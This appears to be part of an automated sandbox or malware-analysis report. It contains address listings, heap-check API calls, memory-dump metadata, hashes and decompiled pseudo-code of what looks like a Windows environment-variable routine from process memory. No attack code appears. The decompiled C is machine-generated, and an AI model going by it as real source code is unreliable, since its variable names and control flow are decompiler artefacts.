                                                                                                                            0x6b2944dc
                                                                                                                            0x6b2944de
                                                                                                                            0x6b2944e0
                                                                                                                            0x6b294560
                                                                                                                            0x6b294520
                                                                                                                            0x6b294522
                                                                                                                            0x6b294525
                                                                                                                            0x6b294528
                                                                                                                            0x6b29452b
                                                                                                                            0x6b29452e
                                                                                                                            0x6b294530
                                                                                                                            0x6b294697
                                                                                                                            0x6b29469d
                                                                                                                            0x6b2946a1
                                                                                                                            0x6b2946c0
                                                                                                                            0x6b2946c5
                                                                                                                            0x6b2946a3
                                                                                                                            0x6b2946b8
                                                                                                                            0x6b2946bd
                                                                                                                            0x6b2946cb
                                                                                                                            0x6b2946d4
                                                                                                                            0x6b294677
                                                                                                                            0x6b294677
                                                                                                                            0x6b294679
                                                                                                                            0x6b29467c
                                                                                                                            0x6b29468a
                                                                                                                            0x6b294690
                                                                                                                            0x6b294690
                                                                                                                            0x6b2947f1
                                                                                                                            0x6b2947f1
                                                                                                                            0x6b2947f1
                                                                                                                            0x00000000
                                                                                                                            0x6b2947f1
                                                                                                                            0x6b294536
                                                                                                                            0x6b294539
                                                                                                                            0x6b29453c
                                                                                                                            0x6b294636
                                                                                                                            0x6b29463c
                                                                                                                            0x6b294640
                                                                                                                            0x6b29465f
                                                                                                                            0x6b294664
                                                                                                                            0x6b294642
                                                                                                                            0x6b294657
                                                                                                                            0x6b29465c
                                                                                                                            0x6b294670
                                                                                                                            0x00000000
                                                                                                                            0x6b294542
                                                                                                                            0x6b294542
                                                                                                                            0x6b294546
                                                                                                                            0x6b294548
                                                                                                                            0x6b29454b
                                                                                                                            0x6b294555
                                                                                                                            0x6b29455b
                                                                                                                            0x6b29455b
                                                                                                                            0x6b29455b
                                                                                                                            0x6b29455d
                                                                                                                            0x6b29455d
                                                                                                                            0x6b29455d
                                                                                                                            0x00000000
                                                                                                                            0x6b29455d
                                                                                                                            0x6b29453c
                                                                                                                            0x6b294579
                                                                                                                            0x6b29457c
                                                                                                                            0x6b294587
                                                                                                                            0x6b294589
                                                                                                                            0x6b294591
                                                                                                                            0x6b294592
                                                                                                                            0x6b294597
                                                                                                                            0x6b294598
                                                                                                                            0x6b2945a1
                                                                                                                            0x6b2945ab
                                                                                                                            0x6b2945ab
                                                                                                                            0x6b2945a1
                                                                                                                            0x6b2945ae
                                                                                                                            0x6b2945b4
                                                                                                                            0x6b2945b9
                                                                                                                            0x6b2945bd
                                                                                                                            0x6b294759
                                                                                                                            0x6b294759
                                                                                                                            0x6b29475f
                                                                                                                            0x6b294761
                                                                                                                            0x6b294763
                                                                                                                            0x6b294765
                                                                                                                            0x6b294768
                                                                                                                            0x6b29476b
                                                                                                                            0x6b29476d
                                                                                                                            0x6b29479c
                                                                                                                            0x6b29479c
                                                                                                                            0x6b29479f
                                                                                                                            0x6b2947a2
                                                                                                                            0x6b2947a4
                                                                                                                            0x6b294830
                                                                                                                            0x6b294833
                                                                                                                            0x6b294879
                                                                                                                            0x6b29487d
                                                                                                                            0x6b2948f1
                                                                                                                            0x6b2948f3
                                                                                                                            0x6b2948f3
                                                                                                                            0x00000000
                                                                                                                            0x6b2948f3
                                                                                                                            0x6b29487f
                                                                                                                            0x6b294885
                                                                                                                            0x6b294887
                                                                                                                            0x6b2948a8
                                                                                                                            0x6b2948a8
                                                                                                                            0x6b2948ae
                                                                                                                            0x6b2948b0
                                                                                                                            0x6b2948dc
                                                                                                                            0x6b2948dc
                                                                                                                            0x6b2948dc
                                                                                                                            0x6b2948dc
                                                                                                                            0x6b2948ec
                                                                                                                            0x00000000
                                                                                                                            0x6b2948ec
                                                                                                                            0x6b2948b2
                                                                                                                            0x6b2948bc
                                                                                                                            0x6b2948be
                                                                                                                            0x6b2948c1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2948c3
                                                                                                                            0x6b2948c3
                                                                                                                            0x6b2948c6
                                                                                                                            0x6b2948c9
                                                                                                                            0x6b2948cc
                                                                                                                            0x6b2948d1
                                                                                                                            0x6b2948d4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2948d6
                                                                                                                            0x6b2948d7
                                                                                                                            0x6b2948da
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2948da
                                                                                                                            0x6b29494f
                                                                                                                            0x6b294955
                                                                                                                            0x6b294959
                                                                                                                            0x6b294978
                                                                                                                            0x6b29497d
                                                                                                                            0x6b29495b
                                                                                                                            0x6b294970
                                                                                                                            0x6b294975
                                                                                                                            0x6b294986
                                                                                                                            0x6b294987
                                                                                                                            0x6b29498d
                                                                                                                            0x6b294990
                                                                                                                            0x6b294997
                                                                                                                            0x6b2947ef
                                                                                                                            0x6b2947ef
                                                                                                                            0x6b2947ef
                                                                                                                            0x00000000
                                                                                                                            0x6b2947ef
                                                                                                                            0x6b294890
                                                                                                                            0x6b294890
                                                                                                                            0x6b294891
                                                                                                                            0x6b294891
                                                                                                                            0x6b294894
                                                                                                                            0x6b294897
                                                                                                                            0x6b29489d
                                                                                                                            0x6b2948a0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2948a2
                                                                                                                            0x6b2948a3
                                                                                                                            0x6b2948a6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2948a6
                                                                                                                            0x6b2948fb
                                                                                                                            0x6b294901
                                                                                                                            0x6b294905
                                                                                                                            0x6b294924
                                                                                                                            0x6b294929
                                                                                                                            0x6b294907
                                                                                                                            0x6b29491c
                                                                                                                            0x6b294921
                                                                                                                            0x6b29492f
                                                                                                                            0x6b294935
                                                                                                                            0x6b294936
                                                                                                                            0x6b294939
                                                                                                                            0x6b294942
                                                                                                                            0x00000000
                                                                                                                            0x6b294947
                                                                                                                            0x6b294835
                                                                                                                            0x6b29483b
                                                                                                                            0x6b29483f
                                                                                                                            0x6b29485e
                                                                                                                            0x6b294863
                                                                                                                            0x6b294841
                                                                                                                            0x6b294856
                                                                                                                            0x6b29485b
                                                                                                                            0x6b294869
                                                                                                                            0x6b29486c
                                                                                                                            0x6b29486f
                                                                                                                            0x6b2947e7
                                                                                                                            0x6b2947e7
                                                                                                                            0x00000000
                                                                                                                            0x6b2947ec
                                                                                                                            0x6b2947aa
                                                                                                                            0x6b2947b0
                                                                                                                            0x6b2947b4
                                                                                                                            0x6b2947d3
                                                                                                                            0x6b2947d8
                                                                                                                            0x6b2947b6
                                                                                                                            0x6b2947cb
                                                                                                                            0x6b2947d0
                                                                                                                            0x6b2947de
                                                                                                                            0x6b2947df
                                                                                                                            0x6b2947e2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b29476f
                                                                                                                            0x6b29476f
                                                                                                                            0x6b294778
                                                                                                                            0x6b294785
                                                                                                                            0x6b294787
                                                                                                                            0x6b29478c
                                                                                                                            0x6b29478e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294790
                                                                                                                            0x6b294792
                                                                                                                            0x6b294794
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294796
                                                                                                                            0x6b294799
                                                                                                                            0x00000000
                                                                                                                            0x6b294799
                                                                                                                            0x00000000
                                                                                                                            0x6b2945c3
                                                                                                                            0x6b2945c3
                                                                                                                            0x6b2945c7
                                                                                                                            0x6b2945c7
                                                                                                                            0x6b2945ca
                                                                                                                            0x6b2945cf
                                                                                                                            0x6b2945d3
                                                                                                                            0x6b2945df
                                                                                                                            0x6b2945e4
                                                                                                                            0x6b2945e6
                                                                                                                            0x6b2945e8
                                                                                                                            0x6b2945ed
                                                                                                                            0x6b2945ed
                                                                                                                            0x6b2945f2
                                                                                                                            0x6b2945f2
                                                                                                                            0x6b2945f7
                                                                                                                            0x6b2945fc
                                                                                                                            0x6b294602
                                                                                                                            0x6b294606
                                                                                                                            0x6b294609
                                                                                                                            0x6b29460f
                                                                                                                            0x6b2946de
                                                                                                                            0x6b2946e3
                                                                                                                            0x6b2946e5
                                                                                                                            0x6b2946ec
                                                                                                                            0x6b2946ee
                                                                                                                            0x6b2946f6
                                                                                                                            0x6b2946f6
                                                                                                                            0x6b2946f6
                                                                                                                            0x6b2946f6
                                                                                                                            0x6b2946ec
                                                                                                                            0x6b294615
                                                                                                                            0x6b294615
                                                                                                                            0x6b29461d
                                                                                                                            0x6b29462e
                                                                                                                            0x6b29462e
                                                                                                                            0x6b29461d
                                                                                                                            0x6b29460f
                                                                                                                            0x6b294609
                                                                                                                            0x6b2946fd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b294710
                                                                                                                            0x6b29471a
                                                                                                                            0x6b294720
                                                                                                                            0x6b294720
                                                                                                                            0x6b294722
                                                                                                                            0x6b29472c
                                                                                                                            0x00000000
                                                                                                                            0x6b29472e
                                                                                                                            0x6b29472e
                                                                                                                            0x00000000
                                                                                                                            0x6b29472e
                                                                                                                            0x6b29472c
                                                                                                                            0x6b294738
                                                                                                                            0x6b29473c
                                                                                                                            0x6b29474b
                                                                                                                            0x6b294751
                                                                                                                            0x6b294751
                                                                                                                            0x00000000
                                                                                                                            0x6b29473c
                                                                                                                            0x6b2948f4
                                                                                                                            0x6b2948f4
                                                                                                                            0x00000000
                                                                                                                            0x6b2948f4

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B2949A4: ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00001000,00000004,00000000,?,00000000,?,?,6B2944B7,?), ref: 6B2949DF
                                                                                                                              • Part of subcall function 6B2949A4: RtlCompareMemory.1105(?,01000000,?,00000000,?,00000000,?,?,6B2944B7,?), ref: 6B2949FE
                                                                                                                              • Part of subcall function 6B2949A4: DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?), ref: 6B294A42
                                                                                                                              • Part of subcall function 6B2949A4: DbgPrint.1105(Heap %p - headers modified (%p is %lx instead of %lx),?,HEAP: ,HEAP: ,00000000,?), ref: 6B294A66
                                                                                                                            • ZwAllocateVirtualMemory.1105(000000FF,?,00000000,?,00001000,00000004), ref: 6B29459A
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B294657
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C,6B22F07A), ref: 6B294664
                                                                                                                            • DbgPrint.1105(Non-Dedicated free list element %p is out of order,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B294670
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B2946B8
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C,6B22F07A), ref: 6B2946C5
                                                                                                                            • DbgPrint.1105(dedicated (%04Ix) free list element %p is marked busy,00000000,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20), ref: 6B2946D4
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B2947CB
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C,6B22F07A), ref: 6B2947D8
                                                                                                                            • DbgPrint.1105(Total size of free blocks in arena (%Id) does not match number total in heap header (%Id),?,?,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20), ref: 6B2947E7
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B294856
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C,6B22F07A), ref: 6B294863
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B29491C
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C,6B22F07A), ref: 6B294929
                                                                                                                            • DbgPrint.1105(Pseudo Tag %04x size incorrect (%Ix != %Ix) %p,?,00000000,00000000,00000000), ref: 6B294942
                                                                                                                            • DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C), ref: 6B294970
                                                                                                                            • DbgPrint.1105(HEAP: ,?,?,?,?,?,?,?,?,?,?,?,?,6B2B0F20,0000001C,6B22F07A), ref: 6B29497D
                                                                                                                            • DbgPrint.1105(Tag %04x (%ws) size incorrect (%Ix != %Ix) %p,?,?,00000000,?,?), ref: 6B294997
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print$Memory$AllocateVirtual$Compare
                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                            • API String ID: 1841224210-1357697941
                                                                                                                            • Opcode ID: 941270d8b42f79247b808311f6c2155ba8fad5ff4e97f005888dade9ea292170
                                                                                                                            • Instruction ID: c4872d3fd199e2caf52b5864227fc7e99285c3f9ee4160d75fb7a5fe521dff15
                                                                                                                            • Opcode Fuzzy Hash: 941270d8b42f79247b808311f6c2155ba8fad5ff4e97f005888dade9ea292170
                                                                                                                            • Instruction Fuzzy Hash: 6AF1113151064EEFCB21EFAAD484BAAB7F1FF09304F1485A9E47A97280D73CA945CB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B202F70, Relevance: 41.1, APIs: 27, Instructions: 610memorythreadCOMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E6B202F70(void* _a4, void* _a8, signed int _a12, void* _a16, intOrPtr _a20) {
				long _v8;
				signed int _v12;
				char _v20;
				void* _v29;
				char _v30;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				long _v56;
				void* _v60;
				void* _v64;
				long _v68;
				char _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				signed short _v88;
				signed int _v92;
				signed short _v96;
				signed int _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* __ebx;
				void* __ebp;
				signed int _t223;
				long _t226;
				signed int _t227;
				intOrPtr _t229;
				void* _t233;
				void* _t244;
				short* _t247;
				void* _t248;
				short* _t251;
				void* _t252;
				void _t253;
				signed int _t262;
				signed int _t266;
				signed short* _t267;
				signed int _t268;
				void* _t269;
				void* _t279;
				void* _t281;
				void _t299;
				signed int _t315;
				signed int _t325;
				void* _t328;
				void* _t329;
				void* _t330;
				signed int _t333;
				void* _t336;
				void* _t337;
				void* _t343;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t352;
				intOrPtr _t353;
				void* _t355;
				void* _t360;
				signed int _t365;
				signed int _t366;
				short* _t369;
				void* _t370;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t380;
				signed short _t381;
				signed short _t382;
				signed int _t389;
				void* _t390;
				void* _t392;
				void* _t393;
				void* _t395;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t403;
				void* _t406;
				short* _t407;
				void* _t408;
				short* _t409;
				void* _t412;
				int _t413;
				void* _t414;
				void* _t415;
				short* _t416;
				signed int _t419;
				int _t421;
				int _t422;
				signed int _t423;
				int _t424;
				int _t425;
				signed int _t427;
				void* _t428;
				intOrPtr _t429;
				int _t430;
				void* _t433;
				short* _t434;
				int _t436;
				int _t437;
				signed int _t438;
				signed int _t441;
				void* _t442;
				void* _t443;
				void* _t445;

				_push(0xfffffffe);
				_push(0x6b2aff28);
				_push(0x6b2217f0);
				_push( *[fs:0x0]);
				_t443 = _t442 - 0x5c;
				_t223 =  *0x6b2cd360;
				_v12 = _v12 ^ _t223;
				_push(_t223 ^ _t441);
				 *[fs:0x0] =  &_v20;
				_v52 = 0;
				_v68 = 0;
				_v29 = 0;
				_v30 = 0;
				_t419 = _a12;
				if(_t419 == 0) {
					L100:
					_t226 = 0xc000000d;
					L65:
					 *[fs:0x0] = _v20;
					return _t226;
				}
				_t348 = _a8;
				if( *_t348 == 0) {
					goto L100;
				} else {
					_t227 = 1;
					while(_t227 < _t419) {
						_t389 =  *(_t348 + _t227 * 2) & 0x0000ffff;
						if(_t389 == 0 || _t389 == 0x3d) {
							goto L100;
						} else {
							_t227 = _t227 + 1;
							_t348 = _a8;
							continue;
						}
					}
					_t349 = _a16;
					__eflags = _t349;
					if(_t349 == 0) {
						L12:
						_t229 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						_t336 =  *((intOrPtr*)(_t229 + 0x10));
						_v44 = _t336;
						_v108 = _t336;
						_v56 = 0;
						_v72 = 0;
						_t350 = _a4;
						__eflags = _t350;
						if(_t350 != 0) {
							_t351 =  *_t350;
							_v36 = _t351;
							__eflags =  *(_t336 + 0x48) - _t351;
							if( *(_t336 + 0x48) != _t351) {
								L14:
								_v8 = 0;
								_t406 = _t351;
								_v40 = _t406;
								_t337 = 0;
								_v48 = 0;
								__eflags = _t351;
								if(_t351 == 0) {
									L60:
									_t230 = _v72;
									__eflags = _t230;
									if(_t230 != 0) {
										_t406 = _t230;
										_v40 = _t406;
									}
									__eflags = _t337;
									if(_t337 == 0) {
										__eflags = _a16;
										if(_a16 == 0) {
											goto L62;
										}
										__eflags = _t406;
										if(_t406 == 0) {
											_t353 = _a20;
											_t233 = 6 + (_t419 + _t353) * 2;
											_t390 = 0;
											L74:
											_v80 = _t233;
											__eflags = _t233 - _t390;
											if(_t233 < _t390) {
												_t162 = _t353 + 2; // 0x2
												memmove(_t406 + (_t162 + _t419) * 2, _t406, _t337 - _t406 & 0xfffffffe);
												_t421 = _t419 + _t419;
												memcpy(_t406, _a8, _t421);
												_t445 = _t443 + 0x18;
												_t338 = _v29;
												__eflags = _v29;
												if(_v29 != 0) {
													memset(0x6b2c8220, 0, 0x234);
													_t445 = _t445 + 0xc;
												}
												_t407 = _t406 + _t421;
												_v40 = _t407;
												 *_t407 = 0x3d;
												_t408 = _t407 + 2;
												_v40 = _t408;
												_t422 = _a20 + _a20;
												memcpy(_t408, _a16, _t422);
												_t409 = _t408 + _t422;
												_v40 = _t409;
												_t230 = 0;
												 *_t409 = 0;
												_v40 = _t409 + 2;
												__eflags = _a4;
												if(_a4 != 0) {
													goto L63;
												} else {
													_t352 = _v44;
													 *((intOrPtr*)(_t352 + 0x48)) = _v36;
													_t230 = _v80;
													 *((intOrPtr*)(_t352 + 0x290)) = _v80;
													 *((intOrPtr*)(_t352 + 0x294)) =  *((intOrPtr*)(_t352 + 0x294)) + 1;
													goto L64;
												}
											}
											_t355 = E6B2036CC(_t233);
											_v76 = _t355;
											__eflags = _t355;
											if(_t355 == 0) {
												L106:
												_v56 = 0xc000009a;
												goto L62;
											}
											__eflags = _t406;
											if(_t406 == 0) {
												_t423 = 0;
											} else {
												_t392 = _v36;
												_t427 = _t406 - _t392;
												__eflags = _t427;
												_t423 = _t427 >> 1;
												memcpy(_t355, _t392, _t423 + _t423);
												_t443 = _t443 + 0xc;
												_t355 = _v76;
											}
											_t244 = _t355 + _t423 * 2;
											_v64 = _t244;
											_t424 = _a12 + _a12;
											memcpy(_t244, _a8, _t424);
											_t247 = _v64 + _t424;
											 *_t247 = 0x3d;
											_t248 = _t247 + 2;
											_v64 = _t248;
											_t425 = _a20 + _a20;
											memcpy(_t248, _a16, _t425);
											_t251 = _v64 + _t425;
											 *_t251 = 0;
											_t252 = _t251 + 2;
											__eflags = _t406;
											if(_t406 == 0) {
												 *_t252 = 0;
												_t338 = _v29;
											} else {
												memcpy(_t252, _t406, _t337 - _t406 & 0xfffffffe);
												_t338 = _v29;
												__eflags = _v29;
												if(_v29 != 0) {
													memset(0x6b2c8220, 0, 0x234);
												}
											}
											_t360 = _a4;
											_t253 = _v76;
											__eflags = _t360;
											if(_t360 != 0) {
												 *_t360 = _t253;
											} else {
												_t360 = _v44;
												 *(_t360 + 0x48) = _t253;
												 *((intOrPtr*)(_t360 + 0x290)) = _v80;
												_t146 = _t360 + 0x294;
												 *_t146 =  *(_t360 + 0x294) + 1;
												__eflags =  *_t146;
											}
											__eflags = _v30;
											if(_v30 != 0) {
												E6B1EEB70(_t360,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
												_v30 = 0;
											}
											_t230 = RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
											goto L63;
										}
										_v48 = _t406;
										while(1) {
											L69:
											_t262 =  *_t406 & 0x0000ffff;
											__eflags = _t262;
											if(_t262 == 0) {
												break;
											}
											while(1) {
												_t406 = _t406 + 2;
												_v48 = _t406;
												__eflags = _t262;
												if(_t262 == 0) {
													goto L69;
												}
												_t262 =  *_t406 & 0x0000ffff;
											}
										}
										_v48 = _t406 + 2;
										_t390 = E6B2035D0(_t351,  *( *[fs:0x30] + 0x18), 0, _t351);
										_t337 = _v48;
										_t365 = (_t337 - _v36 >> 1) + _t419 + _a20;
										__eflags = _t365;
										_t233 = 4 + _t365 * 2;
										_t406 = _v40;
										_t353 = _a20;
										goto L74;
									} else {
										L62:
										_t338 = _v29;
										L63:
										_t352 = _v44;
										L64:
										_v8 = 0xfffffffe;
										E6B2035A1(_t230, _t338, _t352);
										_t226 = _v56;
										goto L65;
									}
								}
								_v64 = _v68;
								while(1) {
									L16:
									__eflags =  *_t406 - _t337;
									if( *_t406 == _t337) {
										break;
									}
									_t428 = _t406;
									_v76 = _t428;
									_t366 = 0;
									__eflags = 0;
									_v80 = 0;
									while(1) {
										_t406 = _t406 + 2;
										_v40 = _t406;
										_t266 =  *_t406 & 0x0000ffff;
										__eflags = _t266;
										if(_t266 == 0) {
											break;
										}
										__eflags = _t266 - 0x3d;
										if(_t266 != 0x3d) {
											continue;
										}
										_t366 = _t406 - _t428 >> 1;
										_v80 = _t366;
										_t406 = _t406 + 2;
										__eflags = _t406;
										_v40 = _t406;
										_t328 = _t406;
										_v52 = _t328;
										while(1) {
											__eflags =  *_t406 - _t337;
											if( *_t406 == _t337) {
												break;
											}
											_t406 = _t406 + 2;
											_v40 = _t406;
										}
										_t399 = _t406 - _t328;
										__eflags = _t399;
										_t400 = _t399 >> 1;
										_v64 = _t400;
										_v68 = _t400;
										break;
									}
									_t406 = _t406 + 2;
									_v40 = _t406;
									_t393 = _a8;
									_t267 = _t393;
									_v60 = _t393;
									_v84 = _t428;
									__eflags = _a12 - _t366;
									if(_a12 <= _t366) {
										_t366 = _a12;
									}
									_t367 = _t393 + _t366 * 2;
									_v104 = _t367;
									while(1) {
										__eflags = _t267 - _t367;
										if(_t267 >= _t367) {
											break;
										}
										_t381 =  *_t267 & 0x0000ffff;
										_v88 = _t381;
										_t401 = _t381 & 0x0000ffff;
										_v92 = _t401;
										_t382 =  *_t428 & 0x0000ffff;
										_v96 = _t382;
										_t438 = _t382 & 0x0000ffff;
										_v100 = _t438;
										__eflags = _t401 - _t438;
										if(_t401 == _t438) {
											L37:
											_t267 =  &(_t267[1]);
											_v60 = _t267;
											_t428 = _v84 + 2;
											_v84 = _t428;
											_t367 = _v104;
											continue;
										}
										_t367 =  *0x6b2c6d5c;
										__eflags = _t401 - 0x61;
										if(_t401 >= 0x61) {
											__eflags = _t401 - 0x7a;
											if(_t401 > 0x7a) {
												_t315 = ( *( *0x6b2c6d5c + (( *(_t367 + (_t401 >> 8) * 2) & 0x0000ffff) + (_t401 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t401 & 0x0000000f);
												_t367 =  *0x6b2c6d5c;
												_t401 =  *((intOrPtr*)(_t367 + _t315 * 2)) + _v88 & 0x0000ffff;
												_t267 = _v60;
											} else {
												_t401 = _t401 + 0xffffffe0;
											}
										}
										_v92 = _t401;
										__eflags = _t438 - 0x61;
										if(_t438 >= 0x61) {
											__eflags = _t438 - 0x7a;
											if(_t438 > 0x7a) {
												_t325 = ( *( *0x6b2c6d5c + (( *(_t367 + (_t438 >> 8) * 2) & 0x0000ffff) + (_t438 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t438 & 0x0000000f);
												_t367 =  *0x6b2c6d5c;
												_t438 =  *((intOrPtr*)( *0x6b2c6d5c + _t325 * 2)) + _v96 & 0x0000ffff;
												_t267 = _v60;
											} else {
												_t438 = _t438 + 0xffffffe0;
											}
										}
										_v100 = _t438;
										__eflags = _t401 - _t438;
										if(_t401 == _t438) {
											goto L37;
										} else {
											_t395 = _t401 - _t438;
											__eflags = _t395;
											L32:
											__eflags = _t395;
											if(__eflags == 0) {
												_t343 = _t406;
												_v48 = _t343;
												while(1) {
													L44:
													_t268 =  *_t343 & 0x0000ffff;
													__eflags = _t268;
													if(_t268 == 0) {
														break;
													}
													while(1) {
														_t343 = _t343 + 2;
														_v48 = _t343;
														__eflags = _t268;
														if(_t268 == 0) {
															goto L44;
														}
														_t268 =  *_t343 & 0x0000ffff;
													}
												}
												_t337 = _t343 + 2;
												_v48 = _t337;
												_t269 = _a16;
												__eflags = _t269;
												if(_t269 == 0) {
													_push(_t337 - _t406 & 0xfffffffe);
													_push(_t406);
													_push(_v76);
													L89:
													memmove();
													_t443 = _t443 + 0xc;
													L90:
													__eflags = _v29;
													if(_v29 != 0) {
														memset(0x6b2c8220, 0, 0x234);
														_t443 = _t443 + 0xc;
													}
													goto L59;
												}
												_t429 = _a20;
												__eflags = _t429 - _v64;
												if(_t429 <= _v64) {
													_t430 = _t429 + _t429;
													memcpy(_v52, _t269, _t430);
													_t443 = _t443 + 0xc;
													_t369 = _v52 + _t430;
													 *_t369 = 0;
													_t370 = _t369 + 2;
													__eflags = _a20 - _v64;
													if(_a20 == _v64) {
														goto L90;
													}
													_t279 = _t337 - _t406 & 0xfffffffe;
													__eflags = _t279;
													_push(_t279);
													_push(_t406);
													_push(_t370);
													goto L89;
												}
												_t412 = _v36;
												_t281 = E6B2035D0(_t367,  *( *[fs:0x30] + 0x18), 0, _t412);
												_t337 = _v48;
												_t376 = (_t337 - _t412 >> 1) - _v68 + _t429 + (_t337 - _t412 >> 1) - _v68 + _t429;
												_v76 = _t376;
												__eflags = _t376 - _t281;
												if(_t376 < _t281) {
													_t413 = _t429 + _t429;
													_t433 = _v52 + 2 + _t413;
													_t377 = _v40;
													_v80 = _t377;
													memmove(_t433, _t377, _t337 - _t377 & 0xfffffffe);
													_t434 = _t433 - 2;
													 *_t434 = 0;
													memcpy(_t434 - _t413, _a16, _t413);
													_t443 = _t443 + 0x18;
													__eflags = _a4;
													if(_a4 == 0) {
														_t378 = _v44;
														 *((intOrPtr*)(_t378 + 0x48)) = _v36;
														 *((intOrPtr*)(_t378 + 0x290)) = _v76;
														_t213 = _t378 + 0x294;
														 *_t213 =  *(_t378 + 0x294) + 1;
														__eflags =  *_t213;
													}
													__eflags = _v29;
													if(_v29 != 0) {
														memset(0x6b2c8220, 0, 0x234);
														_t443 = _t443 + 0xc;
													}
													_t406 = _v80;
													goto L59;
												}
												_t414 = E6B2036CC(_t376);
												_v80 = _t414;
												__eflags = _t414;
												if(_t414 == 0) {
													goto L106;
												}
												_t379 = _v36;
												_t436 = (_v52 - _t379 >> 1) + (_v52 - _t379 >> 1);
												memcpy(_t414, _t379, _t436);
												_t415 = _t414 + _t436;
												_t437 = _a20 + _a20;
												memcpy(_t415, _a16, _t437);
												_t416 = _t415 + _t437;
												 *_t416 = 0;
												memcpy(_t416 + 2, _v40, _t337 - _v40 & 0xfffffffe);
												_t443 = _t443 + 0x24;
												_t380 = _a4;
												_t299 = _v80;
												__eflags = _t380;
												if(_t380 != 0) {
													 *_t380 = _t299;
												} else {
													_t380 = _v44;
													 *(_t380 + 0x48) = _t299;
													 *((intOrPtr*)(_t380 + 0x290)) = _v76;
													_t92 = _t380 + 0x294;
													 *_t92 =  *(_t380 + 0x294) + 1;
													__eflags =  *_t92;
												}
												__eflags = _v29;
												if(_v29 != 0) {
													memset(0x6b2c8220, 0, 0x234);
													_t443 = _t443 + 0xc;
												}
												__eflags = _v30;
												if(_v30 != 0) {
													E6B1EEB70(_t380,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
													_v30 = 0;
												}
												RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v36);
												_t406 = _v40;
												_t337 = _v48;
												goto L59;
											}
											if(__eflags < 0) {
												__eflags = _v72 - _t337;
												if(_v72 == _t337) {
													_v72 = _v76;
												}
											}
											goto L16;
										}
									}
									_t395 = _a12 - _v80;
									goto L32;
								}
								L59:
